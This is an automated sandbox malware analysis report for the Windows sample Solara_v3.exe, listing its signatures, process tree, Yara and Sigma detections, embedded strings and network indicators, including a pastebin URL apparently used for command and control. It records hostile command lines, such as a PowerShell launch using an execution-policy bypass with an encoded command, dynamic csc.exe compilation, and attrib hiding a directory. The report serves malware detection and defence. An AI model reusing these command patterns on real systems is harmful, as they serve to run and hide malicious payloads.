

Windows Analysis Report
Solara_v3.exe

Overview

General Information

Sample name: Solara_v3.exe
Analysis ID: 1585428
MD5: 404f9a9a90f2729d0acba7e76527fb88
SHA1: 441a37963638e3f4635ef8c5fa35fd8fa566e325
SHA256: 96559ba94a96b7a3ab66125a3556c6a8ec07fe561f8d60bd06f66520e3366c5e
Tags: exe, user-aachum

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • Solara_v3.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Solara_v3.exe" MD5: 404F9A9A90F2729D0ACBA7E76527FB88)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7492 cmdline: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 7644 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 7684 cmdline: "attrib" +h C:\WindowsSystem MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7492
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x21c32:$b2: ::FromBase64String(
  • 0x21c11:$b3: ::UTF8.GetString(
  • 0x6e33b:$s1: -join
  • 0x6e376:$s1: -join
  • 0x6e430:$s1: -join
  • 0x6e45e:$s1: -join
  • 0x6e603:$s1: -join
  • 0x6e626:$s1: -join
  • 0x6e8d9:$s1: -join
  • 0x6e8fa:$s1: -join
  • 0x6e92c:$s1: -join
  • 0x6e974:$s1: -join
  • 0x6e9a1:$s1: -join
  • 0x6e9c8:$s1: -join
  • 0x6e9f3:$s1: -join
  • 0x6ea0f:$s1: -join
  • 0x6ea78:$s1: -join
  • 0x6eefe:$s1: -join
  • 0x6ef20:$s1: -join
  • 0x6ef78:$s1: -join
  • 0x6efa2:$s1: -join
Source: amsi64_7492.amsi.csv
Rule: JoeSecurity_PowershellDecodeAndExecute
Description: Yara detected Powershell decode and execute
Author: Joe Security

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
    Source: Process started | Author: frack113 | Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand
    Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
    Source: Process started | Author: frack113 | Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

    Data Obfuscation

    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
    No Suricata rule has matched



    AV Detection

    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.0% probability
    Source: Solara_v3.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: n.pdbm!P source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb}!` source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: Solara_v3.exe
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}-H source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdb source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdbhP source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 4.0.0.0__b77a5c561934e089\System.Core.pdbF~$ source: powershell.exe, 00000002.00000002.1736252359.00000141FC0BE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000002.00000002.1735869418.00000141FBE99000.00000004.00000020.00020000.00000000.sdmp

    Networking

    Source: unknown | DNS query: name: pastebin.com
    Source: Joe Sandbox View | IP Address: 104.20.3.235
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: pastebin.com
    Source: Solara_v3.exe | String found in binary or memory: http://.css
    Source: Solara_v3.exe | String found in binary or memory: http://.jpg
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
    Source: Solara_v3.exe | String found in binary or memory: http://html4/loose.dtd
    Source: Solara_v3.exe | String found in binary or memory: http://man7.org/linux/man-pages/man2/shutdown.2.html
    Source: Solara_v3.exe | String found in binary or memory: http://my.json.host/data.json
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Solara_v3.exe | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: Solara_v3.exe | String found in binary or memory: https://crbug.com/v8/8520
    Source: Solara_v3.exe | String found in binary or memory: https://crbug.com/v8/8520turbo_fast_api_callsenable
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=ED
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/manual
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/manual/linking_to_external_code/import_maps
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/manual/runtime/compiler_apis#denobundle).
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/examples/cat.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/examples/colors.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/examples/colors.tsGenerate
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/examples/welcome.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/fmt/colors.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/fs/utils.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/http/file_server.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/std/testing/asserts.ts
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/x/
    Source: Solara_v3.exe | String found in binary or memory: https://deno.land/x/example/types.d.ts
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://deno.land:80
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/)
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Module)
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Runtime
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/instant
    Source: Solara_v3.exe | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat
    Source: Solara_v3.exe | String found in binary or memory: https://dl.deno.land/canary-latest.txt
    Source: Solara_v3.exe | String found in binary or memory: https://dl.deno.land/canary/
    Source: Solara_v3.exe | String found in binary or memory: https://dl.deno.land/canary/(b
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://dl.deno.land/canary/(bN
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-invoke
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-path-append
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-shadow-including-inclusive-ancestor
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#event-path
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#get-the-parent
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#retarget
    Source: Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#body-mixin
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-construct-readablestream
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-filtered-response-basic
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-append
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-fill
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-network-error
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#cors-safelisted-response-header-name
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#dom-headers
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#forbidden-response-header-name
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2577)
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/WICG/import-maps#the-import-mapSet
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/beatgammit/base64-js
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/bitinn/node-fetch/blob/master/src/headers.js
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/clap-rs/clap/issues
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/clap-rs/clap/issuesH9
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/clap-rs/clap/issuesH9b
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/ctz/webpki-roots
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/denoland/deno/issues
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/denoland/deno/issues/4591)
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/denoland/deno/releases
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/denoland/deno/tree/master/test_plugin
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/github/fetch/blob/master/fetch.js
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/golang/go/blob/master/LICENSE
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/inexorabletash/text-encoding
    Source: Solara_v3.exe | String found in binary or memory: https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/vadimg/js_bintrees.
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E49A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: Solara_v3.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer).
    Source: Solara_v3.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.Grow).
    Source: Solara_v3.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.ReadFrom).
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://golang.org/pkg/io/#pkg-constants
    Source: Solara_v3.exe | String found in binary or memory: https://myserver.com
    Source: Solara_v3.exe | String found in binary or memory: https://no-color.org/
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: Solara_v3.exe, 00000000.00000003.1750185198.0000009508082000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/RsTRUBeb
    Source: Solara_v3.exe, 00000000.00000003.1749303648.00000203FC668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/RsTRUBeb):
    Source: Solara_v3.exe | String found in binary or memory: https://some/file.ts
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://streams.spec.whatwg.org/
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2046#section-5.1
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://url.spec.whatwg.org/#idna
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://url.spec.whatwg.org/#port-state
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
